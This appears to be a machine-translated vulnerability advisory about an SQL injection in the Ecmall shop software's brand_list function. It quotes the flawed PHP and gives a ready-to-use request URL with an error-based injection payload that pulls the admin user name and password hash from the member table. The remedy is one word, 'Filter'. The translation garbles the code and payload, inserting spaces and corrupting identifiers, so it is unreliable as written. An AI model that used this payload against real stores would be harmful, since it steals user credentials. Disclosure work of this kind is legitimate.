Ecmall SQL Injection Vulnerability

Ecmall SQL Injection Vulnerability

Defect file:/app/my_goods.app.php

 

Function brand_list () {if (! Empty ($ _ GET ['brand _ name']) |! Empty ($ _ GET ['store']) {$ _ GET ['brand _ name'] & $ filtered = "AND brand_name LIKE '% {$ _ GET ['brand _ name']} % '"; $ _ GET ['store'] & $ filtered = $ filtered. "AND store_id = ". $ this-> _ store_id;} if (isset ($ _ GET ['Port']) & isset ($ _ GET ['order']) {$ sort = strtolower (trim ($ _ GET ['sort ']); // unfiltered $ order = strtolower (trim ($ _ GET ['order']); if (! In_array ($ order, array ('asc ', 'desc') {$ sort = 'store _ id'; $ order = 'desc ';}} else {$ sort = 'store _ id'; $ order = 'desc';} $ page = $ this-> _ get_page (10 ); $ conditions = $ this-> _ get_query_conditions ($ con ); $ brand = $ this-> _ brand_mod-> find (array (// trace 'conditions' => "(1 = 1 $ conditions )". $ filtered, 'limit' => $ page ['limit'], 'order' => "$ sort $ order ", // here 'Count' => true,); function find ($ para MS = array () {extract ($ this-> _ initFindParams ($ params);/* field (select from) */$ fields = $ this-> getRealFields ($ fields); $ fields = ''& $ fields = '*'; $ tables = $ this-> table. ''. $ this-> alias;/* left join */$ join_result = $ this-> _ joinModel ($ tables, $ join ); /* it was originally ($ join_result | $ index_key), and forgot the original intention. By default, the primary key should be added only to serve the array to obtain the index, therefore, it is only related to whether the index key is a primary key */if ($ index_key = $ this-> prikey | (is_array ($ Index_key) & in_array ($ this-> prikey, $ index_key) {/* If the index key contains a primary key, by default, the primary key */$ fields is added after the field to be queried. = ", {$ this-> alias }. {$ this-> prikey} ";}/* condition (WHERE) */$ conditions = $ this-> _ getConditions ($ conditions, true ); /* sort (order by) */$ order & $ order = 'ORDER '. $ this-> getRealFields ($ order); // trace ...... Function getRealFields ($ src_fields_list) {$ fields = $ src_fields_list; if (! $ Src_fields_list) {$ fields = '';} $ fields = preg_replace ('/([a-zA-Z0-9 _] + )\. ([a-zA-Z0-9 _ *] +)/E', "\ $ this-> _ getFieldTable ('\ 1 '). '. \ 2 '", $ fields); // return $ fields;} function _ getFieldTable ($ owner) {if ($ owner = 'eas ') {return $ this-> alias;} else {$ m = & m ($ owner); if ($ m = false) {/* if no object exists, returns */return $ owner;} return $ m-> alias ;}}

Injection exists

Usage:

A registered member opens a store

Access: index. php? App = my_goods & act = brand_list & order = asc & sort = 1 and (select user_name from ecm_member where user_id = 1 union select 1 from (select count (*), concat (floor (rand (0) * 2), (select concat (user_name, password) from ecm_member limit 0, 1) a from information_schema.tables group by a) B) % 23



The user name and password are displayed.

 

Solution:

Filter